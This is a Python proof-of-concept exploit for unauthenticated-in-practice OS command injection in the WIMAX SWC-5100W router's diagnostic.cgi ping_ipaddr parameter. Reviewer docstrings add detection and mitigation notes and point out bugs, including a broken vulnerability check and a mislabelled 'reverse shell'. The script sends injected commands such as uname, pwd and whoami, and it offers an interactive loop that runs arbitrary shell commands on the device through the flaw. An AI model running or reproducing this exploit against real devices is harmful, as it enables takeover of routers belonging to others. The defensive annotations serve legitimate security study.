# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE
# Vulnerability Name: Ballin' Mada
# Date: 4/3/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)
# Tested on: Unix
# CVE : Under registration

"""Proof of concept for an OS command injection in the SWC-5100W web UI.

Every request below targets ``/cgi-bin/diagnostic.cgi`` and places a ``;``
followed by a shell command in the ``ping_ipaddr`` query parameter, i.e. the
value of that parameter reaches a shell without being validated as an IP
address.  The command output is read back out of the returned HTML.

Defensive notes (derived from the requests this script sends):
  * Detection: a ``GET`` to ``diagnostic.cgi`` whose ``ping_ipaddr`` value
    contains ``;``, quotes, or HTML markup is never a legitimate ping target
    and is a reliable alert signature on web-server / WAF logs.
  * Mitigation: the parameter should be validated as an IP address server-side
    and passed to ``ping`` without a shell; the management interface should
    not be reachable from untrusted networks.
  * NOTE(review): the title says "Authenticated", but no credentials, cookies
    or session token are sent anywhere in this script -- presumably the
    caller is expected to already have a session or network-level access;
    confirm against the device before relying on the "authenticated" claim.
"""

import requests
import random,argparse
import sys
from colorama import Fore
from bs4 import BeautifulSoup

# Terminal colour codes used in the status messages.
red = Fore.RED
green = Fore.GREEN
cyan = Fore.CYAN
yellow = Fore.YELLOW
reset = Fore.RESET

# Command-line interface.  Only three options are registered here; the
# ``-fz, --fuzz`` option mentioned in help() below does not exist.
argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--target", help="Target router")
argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')
argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')
args = argParser.parse_args()
target = args.target        # host[:port] inserted verbatim into every URL
rev = args.reverseShell
testX = args.testExploit

# Banner printed on every code path.  (Layout reconstructed from a collapsed
# listing; the original whitespace inside the art is not recoverable.)
banner = """
 ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____
||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||
||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|
RCE 0day in WIMAX SWC-5100W
[ Spell the CGI as in Cyber Guy ]
"""


def checkEXP():
    """Send a marker-echo probe and report whether the marker came back.

    A first request echoes one of two marker strings through the injection
    point; if the HTTP status is 200 the page text is searched for the
    markers.  On a "vulnerable" verdict a second request echoes the output
    of ``uname -a``, ``pwd`` and ``whoami`` wrapped in an ``<a id='pwned'>``
    element and prints that element's text.

    NOTE(review): the verdict condition is unreliable.  ``str.find`` returns
    -1 when the substring is absent, and -1 is truthy, so the right-hand
    ``or`` operand makes the "vulnerable" branch run whenever the second
    marker is *not* present -- i.e. the script will claim success against a
    non-vulnerable host and then raise AttributeError on ``.find(id=...)``
    returning None.  Treat the verdict as indicative only.
    """
    print(cyan + "[+] Checking if target is vulnerable" + reset)
    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
    # Only one marker is echoed, but both are searched for below.
    request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)
    if request.status_code == 200:
        print(green + "[+] Status code: 200 success" + reset)
        soup = BeautifulSoup(request.text, 'html.parser')
        # See the docstring: the second operand is -1 (truthy) when the
        # marker is absent, so this condition is almost always true.
        if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):
            print(green + "[+] Target is vulnerable" + reset)
            # ``+`` signs are URL-encoded spaces; the echoed HTML wraps the
            # command output so it can be located by element id.
            uname = requests.get(url = 
            f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: <code>uname+-a</code> -=-=- [*] Current directory: <code>pwd</code> -=-=- [*] User: <code>whoami</code></a>\";")
            soup_validate = BeautifulSoup(uname.text, 'html.parser')
            # Raises AttributeError if no element with id="pwned" exists.
            print(soup_validate.find(id="pwned").text)
        else:
            print(red + "[+] Seems to be not vulnerable" + reset)
    else:
        print(red + "[+] Status code: " + str(request.status_code) + reset)


def revShell():
    """Interactive request-per-command loop (not a reverse shell).

    Despite the name, no connection back to the operator is opened: each
    line typed at the prompt is sent in a separate GET through the same
    injection point, wrapped in ``<a id='result'>``, and that element's text
    is printed.  Typing ``exit`` or ``quit`` (after it has been sent) ends
    the session; Ctrl-C exits immediately.

    NOTE(review): the ``while`` loop never iterates twice -- the ``else``
    branch recurses via ``return revShell()`` for every command, so each
    command adds a stack frame and a long session can hit the recursion
    limit.  A ``cmd`` that produces no ``id="result"`` element raises
    AttributeError.  An empty line ends the function (``while cmd`` is
    false) without printing anything.
    """
    cmd = input("CGI #:- ")
    while cmd:
        try:
            print(cmd)
            # ``{cmd}`` is interpolated unencoded into the query string.
            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'><code>{cmd}</code></a>\";")
            resp = BeautifulSoup(uname.text, 'html.parser')
            print(resp.find(id="result").text)
            # The exit/quit check runs only after the command was already sent.
            if cmd == "exit" or cmd == "quit":
                print(yellow + "[*] Terminating ..." + reset)
                sys.exit(0)
            else:
                return revShell()
        except KeyboardInterrupt:
            sys.exit(0)


def help():
    """Print a usage example.

    Never called: the dispatch below uses ``argParser.print_help()``.  The
    ``-fz, --fuzz`` option listed here is not registered on ``argParser``.
    Shadows the builtin ``help``.
    """
    print(
        """
        [+] Example: python3 pwnMada.py -t 192.168.1.1 -rv
        [*] -t, --target :: Specify target to attack.
        [*] -rv, --reverseShell :: Obtain reverse shell.
        [*] -tx, --testExploit :: Test the exploitability of the target.
        [*] -fz, --fuzz :: Fuzz the target with arbitrary chars.
        """
    )


# Dispatch: ``-rv`` wins over ``-tx`` when both are given; no target (or
# neither flag) prints the banner and argparse's own help.
if target and rev:
    print(banner)
    revShell()
elif target and testX:
    print(banner)
    checkEXP()
else:
    print(banner)
    argParser.print_help()